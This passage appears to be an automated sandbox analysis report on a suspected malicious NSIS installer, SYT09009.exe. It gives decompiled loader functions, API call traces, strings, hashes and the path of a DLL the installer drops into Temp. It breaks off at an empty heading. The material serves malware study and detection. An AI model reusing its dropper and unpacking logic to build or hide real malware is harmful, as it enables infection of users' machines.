0x00000000
0x00403a28
0x00403a23
0x00403a25
0x00000000
0x00000000
0x00000000
0x00403a25
0x00403a05

APIs

Part of subcall function 00406500: GetModuleHandleA.KERNEL32(?,?,?,004033BB,0000000B), ref: 00406512
Part of subcall function 00406500: GetProcAddress.KERNEL32(00000000,?), ref: 0040652D

GetUserDefaultUILanguage.KERNEL32(00000002,7519FA90,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SYT09009.exe" ,00000000), ref: 00403924

Part of subcall function 00406055: wsprintfA.USER32 ref: 00406062

lstrcatA.KERNEL32(1033,0042A890,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A890,00000000,00000002,7519FA90,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SYT09009.exe" ,00000000), ref: 00403985
lstrlenA.KERNEL32(KXCJDFJSKF,?,?,?,KXCJDFJSKF,00000000,C:\Users\user\AppData\Local\Temp,1033,0042A890,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A890,00000000,00000002,7519FA90), ref: 004039FA
lstrcmpiA.KERNEL32(?,.exe,KXCJDFJSKF,?,?,?,KXCJDFJSKF,00000000,C:\Users\user\AppData\Local\Temp,1033,0042A890,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A890,00000000), ref: 00403A0D
GetFileAttributesA.KERNEL32(KXCJDFJSKF), ref: 00403A18
LoadImageA.USER32 ref: 00403A61
RegisterClassA.USER32 ref: 00403A9E
SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403AB6
CreateWindowExA.USER32 ref: 00403AEB
ShowWindow.USER32(00000005,00000000), ref: 00403B21
GetClassInfoA.USER32 ref: 00403B4D
GetClassInfoA.USER32 ref: 00403B5A
RegisterClassA.USER32 ref: 00403B63
DialogBoxParamA.USER32 ref: 00403B82

Strings

1033, xrefs: 0040392A, 00403980
Control Panel\Desktop\ResourceLocale, xrefs: 0040393E
RichEd20, xrefs: 00403B27
C:\Users\user\AppData\Local\Temp, xrefs: 00403994, 0040399C, 00403A34, 00403A3A, 00403A4A
RichEd32, xrefs: 00403B35
KXCJDFJSKF, xrefs: 004039C8, 004039D0, 004039DD, 00403A27, 00403A2D
C:\Users\user\AppData\Local\Temp\, xrefs: 0040390F
RichEdit, xrefs: 00403B54
.DEFAULT\Control Panel\International, xrefs: 00403970
RichEdit20A, xrefs: 00403B45, 00403B4B
_Nb, xrefs: 00403A7D, 00403AE5
"C:\Users\user\Desktop\SYT09009.exe" , xrefs: 0040390E
.exe, xrefs: 00403A07

Memory Dump Source

Source File: 00000000.00000002.250695784.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.250691921.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250703820.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250708634.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250715810.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250726496.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250731472.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250736343.0000000000438000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250740572.000000000043A000.00000002.00020000.sdmp Download File

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
String ID: "C:\Users\user\Desktop\SYT09009.exe" $.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$KXCJDFJSKF$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
API String ID: 606308-3523317275
Opcode ID: bf4b58a18f8def52aed812ad83ca3b0c7ceda486cf0da5eaf41a6ea4bc3d6bf1
Instruction ID: 74cd8b4f7d81cde8c77274d740e3983652abf123a0ec58253698c850822a2f16
Opcode Fuzzy Hash: bf4b58a18f8def52aed812ad83ca3b0c7ceda486cf0da5eaf41a6ea4bc3d6bf1
Instruction Fuzzy Hash: EC61A5702402016ED220FB669D46F373ABCEB4474DF50403FF995B62E3DA7DA9068A2D

Uniqueness

Uniqueness Score: -1.00%

Function 00402EA1, Relevance: 26.4, APIs: 5, Strings: 10, Instructions: 181
memoryCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E00402EA1(void* __eflags, signed int _a4) {
				DWORD* _v8;
				DWORD* _v12;
				void* _v16;
				intOrPtr _v20;
				long _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				long _t43;
				long _t50;
				void* _t57;
				intOrPtr* _t59;
				long _t60;
				long _t70;
				signed int _t77;
				intOrPtr _t80;
				long _t82;
				void* _t85;
				signed int _t87;
				void* _t89;
				long _t90;
				long _t93;
				intOrPtr* _t94;

				_t82 = 0;
				_v12 = 0;
				_v8 = 0;
				_t43 = GetTickCount();
				_t91 = "C:\\Users\\alfons\\Desktop\\SYT09009.exe";
				 *0x42f430 = _t43 + 0x3e8;
				GetModuleFileNameA(0, "C:\\Users\\alfons\\Desktop\\SYT09009.exe", 0x400);
				_t89 = E00405C90(_t91, 0x80000000, 3);
				_v16 = _t89;
				 *0x40a018 = _t89;
				if(_t89 == 0xffffffff) {
					return "Error launching installer";
				}
				_t92 = "C:\\Users\\alfons\\Desktop";
				E004060F7("C:\\Users\\alfons\\Desktop", _t91);
				E004060F7(0x437000, E00405AD6(_t92));
				_t50 = GetFileSize(_t89, 0);
				 *0x42944c = _t50;
				_t93 = _t50;
				if(_t50 <= 0) {
					L24:
					E00402E3D(1);
					if( *0x42f438 == _t82) {
						goto L29;
					}
					if(_v8 == _t82) {
						L28:
						_t94 = GlobalAlloc(0x40, _v24);
						E00403300( *0x42f438 + 0x1c);
						_push(_v24);
						_push(_t94);
						_push(_t82);
						_push(0xffffffff); // executed
						_t57 = E004030D8(); // executed
						if(_t57 == _v24) {
							 *0x42f434 = _t94;
							 *0x42f43c =  *_t94;
							if((_v44 & 0x00000001) != 0) {
								 *0x42f440 =  *0x42f440 + 1;
							}
							_t40 = _t94 + 0x44; // 0x44
							_t59 = _t40;
							_t85 = 8;
							do {
								_t59 = _t59 - 8;
								 *_t59 =  *_t59 + _t94;
								_t85 = _t85 - 1;
							} while (_t85 != 0);
							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
							 *(_t94 + 0x3c) = _t60;
							E00405C4B(0x42f460, _t94 + 4, 0x40);
							return 0;
						}
						goto L29;
					}
					E00403300( *0x41d440);
					if(E004032EA( &_a4, 4) == 0 || _v12 != _a4) {
						goto L29;
					} else {
						goto L28;
					}
				} else {
					do {
						_t90 = _t93;
						asm("sbb eax, eax");
						_t70 = ( ~( *0x42f438) & 0x00007e00) + 0x200;
						if(_t93 >= _t70) {
							_t90 = _t70;
						}
						if(E004032EA(0x415440, _t90) == 0) {
							E00402E3D(1);
							L29:
							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						if( *0x42f438 != 0) {
							if((_a4 & 0x00000002) == 0) {
								E00402E3D(0);
							}
							goto L20;
						}
						E00405C4B( &_v44, 0x415440, 0x1c);
						_t77 = _v44;
						if((_t77 & 0xfffffff0) == 0 && _v40 == 0xdeadbeef && _v28 == 0x74736e49 && _v32 == 0x74666f73 && _v36 == 0x6c6c754e) {
							_a4 = _a4 | _t77;
							_t87 =  *0x41d440; // 0x877fe
							 *0x42f4e0 =  *0x42f4e0 | _a4 & 0x00000002;
							_t80 = _v20;
							 *0x42f438 = _t87;
							if(_t80 > _t93) {
								goto L29;
							}
							if((_a4 & 0x00000008) != 0 || (_a4 & 0x00000004) == 0) {
								_v8 = _v8 + 1;
								_t24 = _t80 - 4; // 0x40a194
								_t93 = _t24;
								if(_t90 > _t93) {
									_t90 = _t93;
								}
								goto L20;
							} else {
								break;
							}
						}
						L20:
						if(_t93 <  *0x42944c) {
							_v12 = E004065B7(_v12, 0x415440, _t90);
						}
						 *0x41d440 =  *0x41d440 + _t90;
						_t93 = _t93 - _t90;
					} while (_t93 != 0);
					_t82 = 0;
					goto L24;
				}
			}

0x00402ea9
0x00402eac
0x00402eaf
0x00402eb2
0x00402eb8
0x00402ec9
0x00402ece
0x00402ee1
0x00402ee6
0x00402ee9
0x00402eef
0x00000000
0x00402ef1
0x00402efc
0x00402f02
0x00402f13
0x00402f1a
0x00402f22
0x00402f27
0x00402f29
0x00403014
0x00403016
0x00403022
0x00000000
0x00000000
0x00403027
0x0040304b
0x00403056
0x00403061
0x00403066
0x00403069
0x0040306a
0x0040306b
0x0040306d
0x00403075
0x0040308c
0x00403094
0x00403099
0x0040309b
0x0040309b
0x004030a3
0x004030a3
0x004030a6
0x004030a7
0x004030a7
0x004030aa
0x004030ac
0x004030ac
0x004030b6
0x004030bc
0x004030ca
0x00000000
0x004030cf
0x00000000
0x00403075
0x0040302f
0x00403041
0x00000000
0x00000000
0x00000000
0x00000000
0x00402f2f
0x00402f34
0x00402f39
0x00402f3d
0x00402f44
0x00402f4b
0x00402f4d
0x00402f4d
0x00402f58
0x00403080
0x00403077
0x00000000
0x00403077
0x00402f65
0x00402fe5
0x00402fe9
0x00402fee
0x00000000
0x00402fe5
0x00402f6e
0x00402f73
0x00402f7b
0x00402fa1
0x00402fa7
0x00402fb0
0x00402fb6
0x00402fbb
0x00402fc1
0x00000000
0x00000000
0x00402fcb
0x00402fd3
0x00402fd6
0x00402fd6
0x00402fdb
0x00402fdd
0x00402fdd
0x00000000
0x00000000
0x00000000
0x00000000
0x00402fcb
0x00402fef
0x00402ff5
0x00403001
0x00403001
0x00403004
0x0040300a
0x0040300a
0x00403012
0x00000000
0x00403012

APIs

GetTickCount.KERNEL32 ref: 00402EB2
GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\SYT09009.exe,00000400), ref: 00402ECE

Part of subcall function 00405C90: GetFileAttributesA.KERNEL32(00000003,00402EE1,C:\Users\user\Desktop\SYT09009.exe,80000000,00000003), ref: 00405C94
Part of subcall function 00405C90: CreateFileA.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405CB6

GetFileSize.KERNEL32(00000000,00000000,00437000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\SYT09009.exe,C:\Users\user\Desktop\SYT09009.exe,80000000,00000003), ref: 00402F1A
GlobalAlloc.KERNEL32(00000040,00000020), ref: 00403050

Strings

Null, xrefs: 00402F98
soft, xrefs: 00402F8F
C:\Users\user\AppData\Local\Temp\, xrefs: 00402EA8
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00403077
C:\Users\user\Desktop, xrefs: 00402EFC, 00402F01, 00402F07
Error launching installer, xrefs: 00402EF1
@TA, xrefs: 00402F2F
Inst, xrefs: 00402F86
"C:\Users\user\Desktop\SYT09009.exe" , xrefs: 00402EA1
C:\Users\user\Desktop\SYT09009.exe, xrefs: 00402EB8, 00402EC7, 00402EDB, 00402EFB

Memory Dump Source

Source File: 00000000.00000002.250695784.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.250691921.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250703820.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250708634.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250715810.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250726496.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250731472.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250736343.0000000000438000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250740572.000000000043A000.00000002.00020000.sdmp Download File

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: "C:\Users\user\Desktop\SYT09009.exe" $@TA$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\SYT09009.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
API String ID: 2803837635-2825056217
Opcode ID: d2642f5c1e57ff917447350ecc80b65a471f1c26fbd3ec2d1bf2d56bf534e989
Instruction ID: b77d5a27d8a3a8735664692b17331c00252a13d20c8f5ee7c59d5cd6c332e3a5
Opcode Fuzzy Hash: d2642f5c1e57ff917447350ecc80b65a471f1c26fbd3ec2d1bf2d56bf534e989
Instruction Fuzzy Hash: B851E471A00204ABDF20AF64DD85FAF7AB8AB14359F60413BF500B22D1C7B89E858B5D

Uniqueness

Uniqueness Score: -1.00%

Function 00401759, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 147
stringtimeCOMMON

Download Yara Rule

C-Code - Quality: 61%

			E00401759(FILETIME* __ebx, void* __eflags) {
				void* _t33;
				void* _t41;
				void* _t43;
				FILETIME* _t49;
				FILETIME* _t62;
				void* _t64;
				signed int _t70;
				FILETIME* _t71;
				FILETIME* _t75;
				signed int _t77;
				void* _t80;
				CHAR* _t82;
				CHAR* _t83;
				void* _t85;

				_t75 = __ebx;
				_t82 = E00402BCE(0x31);
				 *(_t85 - 8) = _t82;
				 *(_t85 + 8) =  *(_t85 - 0x28) & 0x00000007;
				_t33 = E00405AFC(_t82);
				_push(_t82);
				_t83 = "KXCJDFJSKF";
				if(_t33 == 0) {
					lstrcatA(E00405A8F(E004060F7(_t83, "C:\\Users\\alfons\\AppData\\Local\\Temp")), ??);
				} else {
					E004060F7();
				}
				E004063D2(_t83);
				while(1) {
					__eflags =  *(_t85 + 8) - 3;
					if( *(_t85 + 8) >= 3) {
						_t64 = E0040646B(_t83);
						_t77 = 0;
						__eflags = _t64 - _t75;
						if(_t64 != _t75) {
							_t71 = _t64 + 0x14;
							__eflags = _t71;
							_t77 = CompareFileTime(_t71, _t85 - 0x1c);
						}
						asm("sbb eax, eax");
						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
						__eflags = _t70;
						 *(_t85 + 8) = _t70;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) == _t75) {
						E00405C6B(_t83);
					}
					__eflags =  *(_t85 + 8) - 1;
					_t41 = E00405C90(_t83, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
					__eflags = _t41 - 0xffffffff;
					 *(_t85 - 0xc) = _t41;
					if(_t41 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) != _t75) {
						E0040521E(0xffffffe2,  *(_t85 - 8));
						__eflags =  *(_t85 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t85 - 4)) = 1;
						}
						L31:
						 *0x42f4c8 =  *0x42f4c8 +  *((intOrPtr*)(_t85 - 4));
						__eflags =  *0x42f4c8;
						goto L32;
					} else {
						E004060F7(0x40ac38, 0x430000);
						E004060F7(0x430000, _t83);
						E0040618A(_t75, 0x40ac38, _t83, "C:\Users\alfons\AppData\Local\Temp\nsg940D.tmp\qp16430yyukg.dll",  *((intOrPtr*)(_t85 - 0x14)));
						E004060F7(0x430000, 0x40ac38);
						_t62 = E00405813("C:\Users\alfons\AppData\Local\Temp\nsg940D.tmp\qp16430yyukg.dll",  *(_t85 - 0x28) >> 3) - 4;
						__eflags = _t62;
						if(_t62 == 0) {
							continue;
						} else {
							__eflags = _t62 == 1;
							if(_t62 == 1) {
								 *0x42f4c8 =  &( *0x42f4c8->dwLowDateTime);
								L32:
								_t49 = 0;
								__eflags = 0;
							} else {
								_push(_t83);
								_push(0xfffffffa);
								E0040521E();
								L29:
								_t49 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t49;
				}
				E0040521E(0xffffffea,  *(_t85 - 8));
				 *0x42f4f4 =  *0x42f4f4 + 1;
				_push(_t75);
				_push(_t75);
				_push( *(_t85 - 0xc));
				_push( *((intOrPtr*)(_t85 - 0x20)));
				_t43 = E004030D8(); // executed
				 *0x42f4f4 =  *0x42f4f4 - 1;
				__eflags =  *(_t85 - 0x1c) - 0xffffffff;
				_t80 = _t43;
				if( *(_t85 - 0x1c) != 0xffffffff) {
					L22:
					SetFileTime( *(_t85 - 0xc), _t85 - 0x1c, _t75, _t85 - 0x1c); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t85 - 0x18)) - 0xffffffff;
					if( *((intOrPtr*)(_t85 - 0x18)) != 0xffffffff) {
						goto L22;
					}
				}
				FindCloseChangeNotification( *(_t85 - 0xc)); // executed
				__eflags = _t80 - _t75;
				if(_t80 >= _t75) {
					goto L31;
				} else {
					__eflags = _t80 - 0xfffffffe;
					if(_t80 != 0xfffffffe) {
						E0040618A(_t75, _t80, _t83, _t83, 0xffffffee);
					} else {
						E0040618A(_t75, _t80, _t83, _t83, 0xffffffe9);
						lstrcatA(_t83,  *(_t85 - 8));
					}
					_push(0x200010);
					_push(_t83);
					E00405813();
					goto L29;
				}
				goto L33;
			}

0x00401759
0x00401760
0x00401769
0x0040176c
0x0040176f
0x00401774
0x00401775
0x0040177c
0x00401798
0x0040177e
0x0040177f
0x0040177f
0x0040179e
0x004017a8
0x004017a8
0x004017ac
0x004017af
0x004017b4
0x004017b6
0x004017b8
0x004017bd
0x004017bd
0x004017c8
0x004017c8
0x004017d9
0x004017db
0x004017db
0x004017dc
0x004017dc
0x004017df
0x004017e2
0x004017e5
0x004017e5
0x004017ec
0x004017fb
0x00401800
0x00401803
0x00401806
0x00000000
0x00000000
0x00401808
0x0040180b
0x00401865
0x0040186a
0x004015b0
0x004027bf
0x004027bf
0x00402a5a
0x00402a5d
0x00402a5d
0x00000000
0x0040180d
0x00401813
0x0040181e
0x0040182b
0x00401836
0x0040184c
0x0040184c
0x0040184f
0x00000000
0x00401855
0x00401855
0x00401856
0x00401873
0x00402a63
0x00402a63
0x00402a63
0x00401858
0x00401858
0x00401859
0x00401492
0x00402387
0x00402387
0x00402387
0x00401856
0x0040184f
0x00402a65
0x00402a69
0x00402a69
0x00401883
0x00401888
0x0040188e
0x0040188f
0x00401890
0x00401893
0x00401896
0x0040189b
0x004018a1
0x004018a5
0x004018a7
0x004018af
0x004018bb
0x004018a9
0x004018a9
0x004018ad
0x00000000
0x00000000
0x004018ad
0x004018c4
0x004018ca
0x004018cc
0x00000000
0x004018d2
0x004018d2
0x004018d5
0x004018ed
0x004018d7
0x004018da
0x004018e3
0x004018e3
0x004018f2
0x004018f7
0x00402382
0x00000000
0x00402382
0x00000000

APIs

lstrcatA.KERNEL32(00000000,00000000,KXCJDFJSKF,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401798
CompareFileTime.KERNEL32(-00000014,?,KXCJDFJSKF,KXCJDFJSKF,00000000,00000000,KXCJDFJSKF,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 004017C2

Part of subcall function 004060F7: lstrcpynA.KERNEL32(?,?,00000400,0040341A,Kibris Setup,NSIS Error,?,00000007,00000009,0000000B), ref: 00406104

Part of subcall function 0040521E: lstrlenA.KERNEL32(0042A070,00000000,00422648,7519EA30,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 00405257
Part of subcall function 0040521E: lstrlenA.KERNEL32(00403233,0042A070,00000000,00422648,7519EA30,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 00405267
Part of subcall function 0040521E: lstrcatA.KERNEL32(0042A070,00403233,00403233,0042A070,00000000,00422648,7519EA30), ref: 0040527A
Part of subcall function 0040521E: SetWindowTextA.USER32(0042A070,0042A070), ref: 0040528C
Part of subcall function 0040521E: SendMessageA.USER32 ref: 004052B2
Part of subcall function 0040521E: SendMessageA.USER32 ref: 004052CC
Part of subcall function 0040521E: SendMessageA.USER32 ref: 004052DA

Strings

KXCJDFJSKF, xrefs: 00401775, 0040178B, 0040179D, 004017AE, 004017E4, 004017FA, 00401818, 00401858, 004018D9, 004018E2, 004018EC, 004018F7
C:\Users\user\AppData\Local\Temp, xrefs: 00401786
C:\Users\user\AppData\Local\Temp\nsg940D.tmp\qp16430yyukg.dll, xrefs: 00401826, 00401842

Memory Dump Source

Source File: 00000000.00000002.250695784.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.250691921.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250703820.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250708634.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250715810.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250726496.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250731472.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250736343.0000000000438000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250740572.000000000043A000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nsg940D.tmp\qp16430yyukg.dll$KXCJDFJSKF
API String ID: 1941528284-2984530785
Opcode ID: f339b6a59adf296648f3f8b3866004a1f68460c5fd538596058490c9e85b0c89
Instruction ID: bb6028c3778eb4cec0c6c1d7eb8bf073a5325157b60575559d09146ef789c5eb
Opcode Fuzzy Hash: f339b6a59adf296648f3f8b3866004a1f68460c5fd538596058490c9e85b0c89
Instruction Fuzzy Hash: D4419A32900515BACB107BB5CC45DAF3678EF05329F20833FF426B51E1DA7C8A529A6D

Uniqueness

Uniqueness Score: -1.00%

Function 024413D2, Relevance: 14.0, APIs: 6, Strings: 1, Instructions: 1761memoryfileCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,1C200000,00003000,00000004,?,050A26AF,00000000), ref: 02442959
CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 024429D2

Strings

ed48f5925e3544e08808061d51de7145, xrefs: 02442A3F, 02442A42

Memory Dump Source

Source File: 00000000.00000002.251064774.0000000002440000.00000040.00000001.sdmp, Offset: 02440000, based on PE: false

Similarity

API ID: AllocCreateFileVirtual
String ID: ed48f5925e3544e08808061d51de7145
API String ID: 1475775534-1220391306
Opcode ID: d31712aac19e899beab3c02ea00972f3f918852de0ce78552c983f987ceb7261
Instruction ID: 22e4824a866dc74f34b42421dbd7683ff97047809cb8c9c6cae82bd47bc25bef
Opcode Fuzzy Hash: d31712aac19e899beab3c02ea00972f3f918852de0ce78552c983f987ceb7261
Instruction Fuzzy Hash: 5FE2C815E94398A9EB70CBA4BC16BB96375AF44B10F1054C7E60CEE1E0D7B51FD09B0A

Uniqueness

Uniqueness Score: -1.00%

Function 02440900, Relevance: 10.7, APIs: 7, Instructions: 237fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,55E38B1F,00000000,050A26AF,00000000,D6EB2188,00000000,433A3842), ref: 02440A02
VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?), ref: 02440BCF

Memory Dump Source

Source File: 00000000.00000002.251064774.0000000002440000.00000040.00000001.sdmp, Offset: 02440000, based on PE: false

Similarity

API ID: CreateFileFreeVirtual
String ID:
API String ID: 204039940-0
Opcode ID: 297590f4d892a85bb19936d06693690749b8e763590bf45d25730520320a4a64
Instruction ID: 4c72517c0e8018c3c5ee0fe391d8246c09cd94c905361c8b76f1ad43299b67c7
Opcode Fuzzy Hash: 297590f4d892a85bb19936d06693690749b8e763590bf45d25730520320a4a64
Instruction Fuzzy Hash: 59A13330D10249EFEF14DFE4C985BADBBB1BF08715F20549AE600BA2A0DB745A91DF14

Uniqueness

Uniqueness Score: -1.00%

Function 004030D8, Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 166
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E004030D8(int _a4, intOrPtr _a8, intOrPtr _a12, int _a16, signed char _a19) {
				signed int _v8;
				int _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				char _v88;
				void* _t65;
				void* _t69;
				long _t70;
				intOrPtr _t75;
				long _t76;
				intOrPtr _t77;
				void* _t78;
				int _t88;
				intOrPtr _t92;
				intOrPtr _t95;
				long _t96;
				signed int _t97;
				int _t98;
				int _t99;
				intOrPtr _t100;
				void* _t101;
				void* _t102;

				_t97 = _a16;
				_t92 = _a12;
				_v12 = _t97;
				if(_t92 == 0) {
					_v12 = 0x8000;
				}
				_v8 = _v8 & 0x00000000;
				_v16 = _t92;
				if(_t92 == 0) {
					_v16 = 0x421448;
				}
				_t62 = _a4;
				if(_a4 >= 0) {
					E00403300( *0x42f498 + _t62);
				}
				if(E004032EA( &_a16, 4) == 0) {
					L41:
					_push(0xfffffffd);
					goto L42;
				} else {
					if((_a19 & 0x00000080) == 0) {
						if(_t92 != 0) {
							if(_a16 < _t97) {
								_t97 = _a16;
							}
							if(E004032EA(_t92, _t97) != 0) {
								_v8 = _t97;
								L44:
								return _v8;
							} else {
								goto L41;
							}
						}
						if(_a16 <= _t92) {
							goto L44;
						}
						_t88 = _v12;
						while(1) {
							_t98 = _a16;
							if(_a16 >= _t88) {
								_t98 = _t88;
							}
							if(E004032EA(0x41d448, _t98) == 0) {
								goto L41;
							}
							_t69 = E00405D37(_a8, 0x41d448, _t98); // executed
							if(_t69 == 0) {
								L28:
								_push(0xfffffffe);
								L42:
								_pop(_t65);
								return _t65;
							}
							_v8 = _v8 + _t98;
							_a16 = _a16 - _t98;
							if(_a16 > 0) {
								continue;
							}
							goto L44;
						}
						goto L41;
					}
					_t70 = GetTickCount();
					 *0x40bdac =  *0x40bdac & 0x00000000;
					 *0x40bda8 =  *0x40bda8 & 0x00000000;
					_t14 =  &_a16;
					 *_t14 = _a16 & 0x7fffffff;
					_v20 = _t70;
					 *0x40b890 = 8;
					 *0x415438 = 0x40d430;
					 *0x415434 = 0x40d430;
					 *0x415430 = 0x415430;
					_a4 = _a16;
					if( *_t14 <= 0) {
						goto L44;
					} else {
						goto L9;
					}
					while(1) {
						L9:
						_t99 = 0x4000;
						if(_a16 < 0x4000) {
							_t99 = _a16;
						}
						if(E004032EA(0x41d448, _t99) == 0) {
							goto L41;
						}
						_a16 = _a16 - _t99;
						 *0x40b880 = 0x41d448;
						 *0x40b884 = _t99;
						while(1) {
							_t95 = _v16;
							 *0x40b888 = _t95;
							 *0x40b88c = _v12;
							_t75 = E00406625(0x40b880);
							_v24 = _t75;
							if(_t75 < 0) {
								break;
							}
							_t100 =  *0x40b888; // 0x422648
							_t101 = _t100 - _t95;
							_t76 = GetTickCount();
							_t96 = _t76;
							if(( *0x42f4f4 & 0x00000001) != 0 && (_t76 - _v20 > 0xc8 || _a16 == 0)) {
								wsprintfA( &_v88, "... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
								_t102 = _t102 + 0xc;
								E0040521E(0,  &_v88);
								_v20 = _t96;
							}
							if(_t101 == 0) {
								if(_a16 > 0) {
									goto L9;
								}
								goto L44;
							} else {
								if(_a12 != 0) {
									_t77 =  *0x40b888; // 0x422648
									_v8 = _v8 + _t101;
									_v12 = _v12 - _t101;
									_v16 = _t77;
									L23:
									if(_v24 != 1) {
										continue;
									}
									goto L44;
								}
								_t78 = E00405D37(_a8, _v16, _t101); // executed
								if(_t78 == 0) {
									goto L28;
								}
								_v8 = _v8 + _t101;
								goto L23;
							}
						}
						_push(0xfffffffc);
						goto L42;
					}
					goto L41;
				}
			}

0x004030e0
0x004030e4
0x004030e7
0x004030ec
0x004030ee
0x004030ee
0x004030f5
0x004030f9
0x004030fe
0x00403100
0x00403100
0x00403107
0x0040310c
0x00403117
0x00403117
0x00403129
0x004032d8
0x004032d8
0x00000000
0x0040312f
0x00403133
0x00403285
0x004032c8
0x004032ca
0x004032ca
0x004032d6
0x004032dd
0x004032e0
0x00000000
0x00000000
0x00000000
0x00000000
0x004032d6
0x0040328a
0x00000000
0x00000000
0x0040328c
0x0040328f
0x00403292
0x00403295
0x00403297
0x00403297
0x004032a7
0x00000000
0x00000000
0x004032ae
0x004032b5
0x0040327f
0x0040327f
0x004032da
0x004032da
0x00000000
0x004032da
0x004032b7
0x004032ba
0x004032c1
0x00000000
0x00000000
0x00000000
0x004032c3
0x00000000
0x0040328f
0x0040313f
0x00403141
0x00403148
0x0040314f
0x0040314f
0x00403156
0x0040315e
0x00403168
0x0040316d
0x00403175
0x0040317f
0x00403182
0x00000000
0x00000000
0x00000000
0x00000000
0x00403188
0x00403188
0x00403188
0x00403190
0x00403192
0x00403192
0x004031a3
0x00000000
0x00000000
0x004031a9
0x004031ac
0x004031b2
0x004031b8
0x004031b8
0x004031c3
0x004031c9
0x004031ce
0x004031d5
0x004031d8
0x00000000
0x00000000
0x004031de
0x004031e4
0x004031e6
0x004031ef
0x004031f1
0x0040321f
0x00403225
0x0040322e
0x00403233
0x00403233
0x00403238
0x00403273
0x00000000
0x00000000
0x00000000
0x0040323a
0x0040323e
0x00403255
0x0040325a
0x0040325d
0x00403260
0x00403263
0x00403267
0x00000000
0x00000000
0x00000000
0x0040326d
0x00403247
0x0040324e
0x00000000
0x00000000
0x00403250
0x00000000
0x00403250
0x00403238
0x0040327b
0x00000000
0x0040327b
0x00000000
0x00403188

APIs

